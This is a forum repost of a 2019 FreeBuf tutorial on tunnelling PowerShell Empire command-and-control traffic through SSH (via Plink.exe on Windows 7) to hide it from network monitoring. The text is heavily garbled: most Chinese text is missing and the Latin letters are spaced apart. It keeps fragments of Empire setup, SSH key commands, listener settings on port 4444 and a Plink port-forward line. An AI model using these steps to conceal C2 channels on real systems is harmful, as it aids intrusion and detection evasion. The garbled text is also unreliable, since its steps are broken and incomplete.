[14367] 2019-07-19_利用SSH隧道加密、隐蔽C&C通信流量

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2019-07-19_利用SSH隧道加密、隐蔽C&C通信流量 S S H C & C m u m u f e n g 0 6   F r e e B u f   2 0 1 9 - 0 7 - 1 9 广 广 I S P S S H S S H C & C S S H C & C S S H 使 E m p i r e C & C E m p i r e W i n d o w s 使 P l i n k . e x e S S H S S H 2 . 1   S S H S S H     S S H     S S H     T C P     S S H     t u n n e l i n g   S S H     T C P   S S H 使 S S H S S H S S H   1   S S H C l i e n t     S S H   S e r v e r   2   T C P   S S H S S H   使 S S H   - L ( 1 )   1 - L 使 s s h
( 2 )   2 9 9 0 6 1 0 . 1 . 0 . 2 3 3 0 6     ( 3 )   3 s s h 1 0 . 1 . 0 . 2 r o o t 2 . 2   E m p i r e E m p i r e w i n d o w s S t a g e r   P o w e r S h e l l E m p i r e p o w e r s h e l l . e x e P o w e r S h e l l   P o w e r S h e l l   M i m i k a t z U A C   E m p i r e M e t a s p l o i t P o w e r S h e l l 2 . 2   E m p i r e l i n u x E m p i r e ( ) 使   . / e m p i r e   E m p i r e 使 u b u n t u 1 6     +     w i n d o w s   7 u b u n t u 1 6 w i n d o w s   7 3 . 1   u b u n t u S S H ( 1 )   O p e n - S S H   S e r v e r   g i t   c l o n e   h t t p s : / / g i t h u b . c o m / E m p i r e P r o j e c t / E m p i r e . g i t   # s e t u p c d   E m p i r e c d   s e t u p s u d o   . / i n s t a l l . s h s u d o   a p t - g e t   i n s t a l l   o p e n s s h - s e r v e r
( 2 )   S S H   S e r v e r / e t c / s s h / s s h d _ c o n f i g P e r m i t R o o t L o g i n ( 3 )   S S H I P l i n u x i f c o n f i g , w i n d o w s X S h e l l S e r v e r   I P   S S H   S e r v e r s s h d / e t c / i n i t . d / s s h   r e s a r ( 4 )   R S A a )   r s a b )   s s h d R S A c )   / e t c / s s h / s s h d _ c o n f i g P u b k e y A u t h e n t i c a t i o n y e s d )   h o m e . s s h 使 ( 使 w i n   7 ) e )   使 s s h 使 p u t t y w i n s c p 使 r s a 使 p u t t y s s h r s a . p p k 3 . 2   使 使 E m p i r e P o w e r S h e l l E m p i r e M e t a s p l o i t 使 P o w e r S h e l l   E m p i r e 使 E m p i r e P o w e r S h e l l C & C ( 1 )   s s h - k e y g e n   - t   r s a s s h - c o p y - i d   - i   i d _ r s a . p u b   @ 1 9 2 . 1 6 8 . 8 1 . 1 3 7 s s h   - i     @ 1 9 2 . 1 6 8 . 8 1 . 1 3 7 l i s t e n e r s   # l i s t u s e l i s t e n e r   h t t p   #   i n f o s e t   N a m e   4 4 4 4   # S S H 1 2 7 . 0 . 0 . 1 : 4 4 4 4 s e t   P o r t   4 4 4 4
( 2 )   P o w e r S h e l l ( w i n d o w s ) P o w e r s h e l l w i n d o w s ( w i n 7 w i n 1 0 ) 3 . 3   S S H ( 1 )   w i n d o w s 使 P l i n k . e x e ( p u t t y w i n d o w s 使 S S H ) S S H S e r v e r ( 2 )   P l i n k - s s h   使 - l   - i   R S A - L   ( 3 )   P l i n k 4 4 4 4 1 9 2 . 1 6 8 . 8 1 . 1 3 7 ( 4 4 4 4 使 S S H ( 4 )   使 ( 2 ) P o w e r S h e l l 使 线 a )   w i n d o w s   7 C M D P o w e r S h e l l 线 5 )   u b u n t u a g e n t s l i s t s e t   P o r t   4 4 4 4 s e t   H o s t   1 2 7 . 0 . 0 . 1 e x e c u t e   # 4 4 4 4 1 2 7 . 0 . 0 . 1 : 4 4 4 4 l a u n c h e r   p o w e r s h e l l   4 4 4 4   #   4 4 4 4 # t a g e r s P o w e r S h e l l # P l i n k . e x e P l i n k . e x e   - s s h   - l     - p w     S S H I P p l i n k . e x e   - s s h   - i   s s h r s a . p p k   a m 0 0 n @ 1 9 2 . 1 6 8 . 8 1 . 1 3 7   - L   4 4 4 4 : 1 9 2 . 1 6 8 . 8 1 . 1 3 7 : 4 4 4 4
6 )   i n t e r a c t 使 l s 7 )   使 S S H C & C C & C S S H ( 1 )   S S H R S A ( ) ( 2 )   使 ( E m p i r e M e t a s p l o i t ) C & C ( 3 )   S S H S S H ( 4 )   C & C S S H 使 F r e e B u f " 使 使 " * m u m u f e n g 0 6   F r e e B u f  

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则